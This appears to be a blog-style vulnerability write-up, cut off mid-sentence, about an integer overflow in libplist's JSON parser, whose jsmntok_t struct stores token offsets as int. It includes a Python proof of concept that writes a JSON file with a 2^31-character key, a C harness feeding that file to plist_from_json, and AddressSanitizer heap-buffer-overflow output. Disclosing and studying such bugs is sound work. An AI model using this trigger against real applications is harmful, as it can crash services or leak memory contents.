Integer Overflow Vulnerability In JSON Parsing
Hey guys! Let's dive into a potentially nasty bug that can rear its head when parsing JSON data, specifically within the jsmntok_t structure. This structure is a crucial component in how JSON tokens are described, and a sneaky integer overflow can lead to some serious issues. We'll explore the problem, see how it's triggered, and discuss a fix. This is super important because it can lead to crashes and other security vulnerabilities in applications that process JSON, so pay close attention.
The Problem: Integer Overflow in jsmntok_t
At the heart of the issue lies the jsmntok_t structure. This structure is used to represent tokens within a JSON document. Think of it as a detailed description of each piece of the JSON, like the start and end positions of strings, numbers, and other data types. The structure's definition looks something like this (simplified for clarity):
typedef struct {
jsmntype_t type;
int start;
int end;
int size;
#ifdef JSMN_PARENT_LINKS
int parent;
#endif
} jsmntok_t;
Notice that start, end, and size are all declared as int. This is where the trouble begins. The int data type has a limited range (typically from -2,147,483,648 to 2,147,483,647). When handling very large JSON strings or tokens, these integer variables can easily overflow. This means that if the start, end, or size of a token exceeds the maximum value an int can hold, the value wraps around to a negative number or a much smaller positive number. This leads to incorrect calculations and memory access errors, often resulting in crashes or, worse, security vulnerabilities. This is a classic example of how seemingly small details in data types can have a big impact on the overall security and stability of a software system. Making sure your data types can handle the range of values your program will encounter is essential for preventing these types of issues.
Imagine a scenario where you have a JSON string with a very long string value. If the end position of that string exceeds the maximum value of an int, the end value might wrap around to a small positive number. When the program later tries to access the string using this incorrect end value, it could read data from an invalid memory location, leading to a crash or even allowing an attacker to read sensitive information. Understanding the limitations of your data types and anticipating potential overflow scenarios is a critical part of secure coding practices. This is a key reason why many modern programming languages and libraries use size_t or similar unsigned integer types for representing sizes and offsets, as these types can hold much larger values and reduce the risk of integer overflows.
Triggering the Overflow: Proof of Concept (PoC)
Let's get practical and look at how we can trigger this integer overflow. I'll show you a Python script that crafts a JSON file designed to expose the vulnerability. Here's a simplified version of the Python code:
def stream_write_with_chars(prefix, suffix, char, count, output_file):
if not isinstance(count, int) or count < 0:
raise ValueError("count must be a non-negative integer")
with open(output_file, 'w', encoding='utf-8') as f:
f.write(prefix)
chunk_size = 1024
remaining = count
while remaining > 0:
write_size = min(remaining, chunk_size)
f.write(char * write_size)
remaining -= write_size
f.write(suffix)
print(f"Successfully wrote to file: {output_file}")
print(f"Content structure: prefix({len(prefix)} characters) + {count} '{char}' characters + suffix({len(suffix)} characters)")
if __name__ == "__main__":
prefix = '''{ "Name'''
suffix = '''": "Alice", "Age": 20 }'''
insert_char = "a"
char_count = 0x80000000 # 2^31 characters
output_filename = "6.json"
try:
stream_write_with_chars(prefix, suffix, insert_char, char_count, output_filename)
except Exception as e:
print(f"An error occurred: {e}")
This script generates a JSON file. The key here is the char_count, which is set to 0x80000000, a value that exceeds the maximum positive value for a signed 32-bit integer. The script then creates a JSON file with a prefix, a very long string of 'a' characters (the count specified by char_count), and a suffix. The long string is designed to push the size or end values in jsmntok_t beyond the limits of an int. When the vulnerable C code tries to parse this JSON, the integer overflow will occur when calculating the length or position of the long string. This Python script is a simple, effective tool to create the problematic JSON file.
Now, let's look at the C code, which is designed to parse the generated JSON file:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <plist/plist.h>
plist_err_t plist_from_json(const char *json, uint32_t length, plist_t *plist);
int main(int argc, char **argv)
{
if (argc < 2) {
fprintf(stderr, "Usage: %s <json-plist-file>\n", argv[0]);
return 1;
}
const char *filename = argv[1];
FILE *fp = fopen(filename, "rb");
if (!fp) { perror("fopen"); return 1; }
fseek(fp, 0, SEEK_END);
long size = ftell(fp);
fseek(fp, 0, SEEK_SET);
if (size <= 0) { fprintf(stderr, "File is empty or invalid size\n"); fclose(fp); return 1; }
char *buffer = malloc(size + 1);
if (!buffer) { perror("malloc"); fclose(fp); return 1; }
fread(buffer, 1, size, fp);
buffer[size] = '\0';
fclose(fp);
plist_t root = NULL;
plist_err_t err = plist_from_json(buffer, (uint32_t)size, &root);
if (err != PLIST_ERR_SUCCESS || !root) {
fprintf(stderr, "❌ plist_from_json() failed: %d\n", err);
free(buffer);
return 1;
}
printf("✅ Parsed JSON plist successfully!\n");
char *xml = NULL;
uint32_t length = 0;
plist_to_xml(root, &xml, &length);
if (xml) { printf("\n=== Converted to XML ===\n%s\n", xml); free(xml); }
plist_free(root);
free(buffer);
return 0;
}
This C code reads the JSON file, allocates a buffer, and calls plist_from_json to parse the JSON data. The plist_from_json function is where the parsing occurs, and where the integer overflow vulnerability is triggered when it encounters the long string in the JSON file. The plist_to_xml function then converts the parsed JSON to XML. You'll likely see an error reported during the parsing or conversion stages because the start, end, or size values have overflowed and now contain incorrect values. The C code's purpose is to load and parse the JSON file generated by the Python script, allowing us to witness the effects of the integer overflow. If the parsing is successful, it converts the JSON data into XML format. The error will usually manifest in the parsing or conversion stages, caused by corrupted values.
Observed Result
When we run the vulnerable C code with the JSON file created by the Python script, we'll see an error message, likely indicating a crash or a heap-buffer-overflow. This is because the values used to represent the start and end positions of the oversized string are no longer correct due to the integer overflow. Here is an example of the kind of output you might see:
AddressSanitizer: heap-buffer-overflow ...
READ of size 1 ...
0x7fa4606fb81c is located 0 bytes to the right of 2147483676-byte region ...
SUMMARY: AddressSanitizer: heap-buffer-overflow in unescape_string
The AddressSanitizer (or similar tools) will detect the attempt to read from an invalid memory location, leading to the reported heap-buffer-overflow. This is a clear indication that something went wrong during parsing, and that the overflow has corrupted memory management. The